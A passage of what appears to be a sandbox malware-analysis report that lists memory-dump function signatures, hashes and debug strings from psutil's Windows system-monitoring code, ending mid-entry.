                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Query$CloseCounter__acrt_iob_funcfprintf$Err_FormatValue$BuildCollectDataEnglishFormattedOpenRemove__stdio_common_vfprintf
                                                                                                                                                                                                                • String ID: PdhAddEnglishCounterW failed. Performance counters may be disabled.$PdhCollectQueryData failed; assume swap percent is 0$PdhGetFormattedCounterValue failed$PdhOpenQueryW failed$\Paging File(_Total)\% Usage$psutil-debug [%s:%d]> $psutil/arch/windows\mem.c
                                                                                                                                                                                                                • API String ID: 3912788753-2726665533
                                                                                                                                                                                                                • Opcode ID: 6091d7e37bc3da2c18867fe3a59bf85e485e3be35cbc6a9b6daeb4a7ddad396e
                                                                                                                                                                                                                • Instruction ID: 2bd24ad52e439545303ef17fd796c94de74903c88b99573a2afc15cab8a39e5a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6091d7e37bc3da2c18867fe3a59bf85e485e3be35cbc6a9b6daeb4a7ddad396e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D412FB1B18E4681E6209B77E8541BA2361FF8CB85FC57132D98E42664FE2DF549C780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Service$Arg_BuildCloseErrorHandleLastParseQueryStatusTupleValue
                                                                                                                                                                                                                • String ID: (sk)$QueryServiceStatusEx$unknown
                                                                                                                                                                                                                • API String ID: 740867558-71987940
                                                                                                                                                                                                                • Opcode ID: 77025846c52352fd7251d3eb9722b8e4bc73f7b2a5d6a870d129b6edc9eeed89
                                                                                                                                                                                                                • Instruction ID: a19cd6813b2f6225157e4bf50fb761db06983309c4cbc2736ff3a3482135fd6b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77025846c52352fd7251d3eb9722b8e4bc73f7b2a5d6a870d129b6edc9eeed89
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E512CA1B1CA8682EB24DF77E8541796761FF8DB84F846035DA8D43B68FF2CE5058780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocDict_free$BuildCharEntry2FromItemUnicode_ValueWidemalloc
                                                                                                                                                                                                                • String ID: (KKKKKKKK)$GetIfEntry() or GetIfEntry2() syscalls failed.
                                                                                                                                                                                                                • API String ID: 1733073734-1738093298
                                                                                                                                                                                                                • Opcode ID: 1499f1d03885d1517dcd4e575db20559d8a4ca09919331753b40a178ac74a361
                                                                                                                                                                                                                • Instruction ID: e2f03f6d3e89de503512e93d2e9528cb1cf3a412a73d297c2f6480f2fd24c1b2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1499f1d03885d1517dcd4e575db20559d8a4ca09919331753b40a178ac74a361
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9651F8B1B09F8A85EA649F76E84027923A0BF59F95F886036CE8D47754FF3CD4458780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err___acrt_iob_funcfprintf$FromWindows$AllocLocalString
                                                                                                                                                                                                                • String ID: CallNtPowerInformation syscall failed$GetActiveProcessorCount() not available; using GetSystemInfo()$GetSystemInfo() failed to retrieve CPU count$psutil-debug [%s:%d]> $psutil/arch/windows\cpu.c
                                                                                                                                                                                                                • API String ID: 2295254528-3941425547
                                                                                                                                                                                                                • Opcode ID: 7f1085dd1837f1ef6c884fc82ca1ac5c739219d033371bc9354c9bbd6e1ca84a
                                                                                                                                                                                                                • Instruction ID: e43ae8c7f8e087b271506a4d46085ba65ebf05cc1cab7ce602644c92f9274d11
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f1085dd1837f1ef6c884fc82ca1ac5c739219d033371bc9354c9bbd6e1ca84a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB4123A5F08A5282F7249B37E85427963A0EF8CB94F842436C98D477A4FF2DE585C780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: free$EnumProcessesmalloc
                                                                                                                                                                                                                • String ID: psutil-debug [%s:%d]> $psutil/arch/windows\proc_utils.c$psutil_get_pids() failed
                                                                                                                                                                                                                • API String ID: 3948894879-1935701007
                                                                                                                                                                                                                • Opcode ID: ff672f8289a3b97dcb8ef021960101f72c74e6f4998979b71bc7c99b120796fa
                                                                                                                                                                                                                • Instruction ID: b2479f6749a2247a18a380f6b34f0ce1750e8f5338a03dc8303f583549d05791
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff672f8289a3b97dcb8ef021960101f72c74e6f4998979b71bc7c99b120796fa
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B318AA5F08A0652EB349B37E8542756261AF4DF80F952036D9CE02694FE3CD44586C0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$CloseHandleQueryVirtual$Arg_CharFileFromList_MappedNameParseTupleUnicode_Wide
                                                                                                                                                                                                                • String ID: (KsOI)
                                                                                                                                                                                                                • API String ID: 1797541475-341566991
                                                                                                                                                                                                                • Opcode ID: e8262880df8a5ced126a4acda91b6844434ec5fe8cc853d141dd748cfa495d7f
                                                                                                                                                                                                                • Instruction ID: 82029e6610030f50fd10b7dad12218563c94dc2d020c28be18be675aa91c67ca
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8262880df8a5ced126a4acda91b6844434ec5fe8cc853d141dd748cfa495d7f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B65170B1B09A4285EA748B33E45827963A4FF5DB90F846135DD9E03794FE3CE445C380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_ExtendedTable$MemoryStringfreemalloc
                                                                                                                                                                                                                • String ID: GetExtendedUdpTable failed$GetExtendedUdpTable: retry with different bufsize$psutil-debug [%s:%d]> $psutil/arch/windows\socks.c
                                                                                                                                                                                                                • API String ID: 70375929-1528784589
                                                                                                                                                                                                                • Opcode ID: 55d9d9dc3374df7a068daad7abfd02b2fd5b4a564289884e1b0134a6938486be
                                                                                                                                                                                                                • Instruction ID: 64a2a7c3ce5bfb824976a4a6a34a5ad0eca1cd3859b0ca0540c65698e4c8bd44
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55d9d9dc3374df7a068daad7abfd02b2fd5b4a564289884e1b0134a6938486be
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B74178B5B08A0282E7249B3AF45427963B1FF8C784F856036D98D437A5FF7DD5858B80
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_ExtendedTable$MemoryStringfreemalloc
                                                                                                                                                                                                                • String ID: GetExtendedTcpTable failed$GetExtendedTcpTable: retry with different bufsize$psutil-debug [%s:%d]> $psutil/arch/windows\socks.c
                                                                                                                                                                                                                • API String ID: 70375929-1350966821
                                                                                                                                                                                                                • Opcode ID: bd1c7ac8eac39c2bf01263f676da7dc647cc66e129fb5fee7e0bf14467d57ffb
                                                                                                                                                                                                                • Instruction ID: df9e96d580a798445a0bce5fba6424fd7701f647d66f4e4dd14fd9e05c1408cb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd1c7ac8eac39c2bf01263f676da7dc647cc66e129fb5fee7e0bf14467d57ffb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD4197B5B08A0182E7249B3AF44427963A1FF8C7D4F856036DA8D437A4FF7CD5458B80
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$Arg_ArgvBuildCallCloseCommandErr_FunctionHandleKeywordsLineObjectObject_OpenParseProcessTupleValuefree
                                                                                                                                                                                                                • String ID: CommandLineToArgvW$i|O$psutil_pid_is_running -> 0
                                                                                                                                                                                                                • API String ID: 1577039377-3353757699
                                                                                                                                                                                                                • Opcode ID: 7ef707286af80731c70be7b8a08bec645b5be586077949817ea5f611d28cf24c
                                                                                                                                                                                                                • Instruction ID: a784896d174f0a27ce9d2f638d0d3ff379734d7addbec977c99a4b07ef3c97e9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7ef707286af80731c70be7b8a08bec645b5be586077949817ea5f611d28cf24c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0751A7A5B19E4692EA708F37E8405B963A0BF4CB90FC52131DADD467A4FF3CD4458780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __acrt_iob_funcfprintf$CallDeallocErr_FunctionObjectObject___stdio_common_vfprintf__stdio_common_vsprintf
                                                                                                                                                                                                                • String ID: %s -> ERROR_NOACCESS$(is)$ReadProcessMemory$assume access denied (originated from %s)$psutil-debug [%s:%d]> $psutil/arch/windows\proc_info.c
                                                                                                                                                                                                                • API String ID: 3932792662-3282842418
                                                                                                                                                                                                                • Opcode ID: 8ddbd74063197d27fd476e7291b552cbacf2d495c7f7d6042afda100fb00c8e8
                                                                                                                                                                                                                • Instruction ID: 0a18ec1642cbf49b940846f0913aa981666e848d9ef934d4d9965fc29213af1d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ddbd74063197d27fd476e7291b552cbacf2d495c7f7d6042afda100fb00c8e8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C31ECA5B08A8281EA30DB76E4553B96360FF9CB84FC06136D9CD466A5FE2DE5058780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseErr_ErrorHandleLastProcess$Arg_CallDeallocFromFunctionObjectObject_OpenParseTimesTupleWindows
                                                                                                                                                                                                                • String ID: (ddd)$GetProcessTimes -> ERROR_ACCESS_DENIED$OpenProcess$automatically set for PID 0
                                                                                                                                                                                                                • API String ID: 935190873-3215740380
                                                                                                                                                                                                                • Opcode ID: f304403649b8fc43a3727289106310d60c7b78308e18786ddd0de0213bd49375
                                                                                                                                                                                                                • Instruction ID: 0dc3e8d6b89c4e0f651a1d9c3924bf92c8b6ceffcfbed7caa0d2c2f9933d908b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f304403649b8fc43a3727289106310d60c7b78308e18786ddd0de0213bd49375
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB41C6B1B1DE4686EA61CB37F440179A392AF8C780FC56231E59F53665FF2CE4418740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Service$Arg_BuildCloseConfig2ErrorHandleLastParseQueryTupleValue
                                                                                                                                                                                                                • String ID: QueryServiceConfig2W
                                                                                                                                                                                                                • API String ID: 40459686-608009358
                                                                                                                                                                                                                • Opcode ID: 5b6db606565531edd5297e18b1a8ee90cf512e2b561443191a6fa1691593a2f6
                                                                                                                                                                                                                • Instruction ID: 6b4967aaeca6a4acfa4a6ab102b1af537b05330bf8ba4848f1755c8881fab55a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b6db606565531edd5297e18b1a8ee90cf512e2b561443191a6fa1691593a2f6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82412DA1B1CA8682EB209F26E85416A6760FF8DB94FD46131DADD43BA4FF2CE505C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_$FormatQuery$CollectCounterCreateDataEnglishErrorEventFilenameFromLastOpenWindowsWith
                                                                                                                                                                                                                • String ID: CreateEventW$LoadUpdateEvent$PdhAddEnglishCounterW failed. Performance counters may be disabled.$PdhCollectQueryDataEx failed$PdhOpenQueryW failed$RegisterWaitForSingleObject$\System\Processor Queue Length
                                                                                                                                                                                                                • API String ID: 646616500-2122461562
                                                                                                                                                                                                                • Opcode ID: 4e05a644f45813d87ba8d81d6d7448e41985b546c29842d21a7af58cec599303
                                                                                                                                                                                                                • Instruction ID: 9249668853ab70aa3124160eac7ad2402e83b9f26c42257eae13010edd0986b9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e05a644f45813d87ba8d81d6d7448e41985b546c29842d21a7af58cec599303
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B31EFA5B08A4682EB20DF73E8401A963A1FF8C794FC56035DA8D86764FF3DE549C780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseErr_HandleProcess$Arg_BuildCallDeallocErrorFromFunctionInfoLastMemoryObjectObject_OpenParseTupleValueWindows
                                                                                                                                                                                                                • String ID: (kKKKKKKKKK)$OpenProcess$automatically set for PID 0
                                                                                                                                                                                                                • API String ID: 3753264371-2652395995
                                                                                                                                                                                                                • Opcode ID: a359856cd35421bb7a13a7dfaaf1f6e524f1c22cc6bac77cb5ad82af595cb7a4
                                                                                                                                                                                                                • Instruction ID: 260bd69064bcbc02ebffd1f7b28480fe498791ea713fbed480f3d99093d23db2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a359856cd35421bb7a13a7dfaaf1f6e524f1c22cc6bac77cb5ad82af595cb7a4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE31EE6570DB8681EA709B26F45036A63A0FF8D784F806136DACD43768FF3CD4448780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseErr_HandleProcess$Arg_BuildCallCountersDeallocErrorFromFunctionLastObjectObject_OpenParseTupleValueWindows
                                                                                                                                                                                                                • String ID: (KKKKKK)$OpenProcess$automatically set for PID 0
                                                                                                                                                                                                                • API String ID: 1543235388-302434769
                                                                                                                                                                                                                • Opcode ID: df207976c48d818ced7e2ea94363f71d4ee6f6295f0a505bf589c7a8c8605456
                                                                                                                                                                                                                • Instruction ID: 9bfe558e5d8af2f2653c9e7f4a95d75554b65aa35bae2628a70b98e2ea7f5ea7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: df207976c48d818ced7e2ea94363f71d4ee6f6295f0a505bf589c7a8c8605456
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0310EA1B0DA4681EA709B37E45437A63A1FF9D790F946036DACD42769FE2CE4448780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_ErrorFilenameFromLastOpenServiceWindowsWith$CloseHandleManager__stdio_common_vsprintf
                                                                                                                                                                                                                • String ID: (originated from %s)$OpenSCManager$OpenService
                                                                                                                                                                                                                • API String ID: 4285539973-532727491
                                                                                                                                                                                                                • Opcode ID: 3815096754f83270638b2f75041748c4c5a74b75e2489ef7d1a75f0052e1f187
                                                                                                                                                                                                                • Instruction ID: 294dccdbb437e9f246763fd91d8a1a5b27391f22a0e003ba82f89bdfaa721432
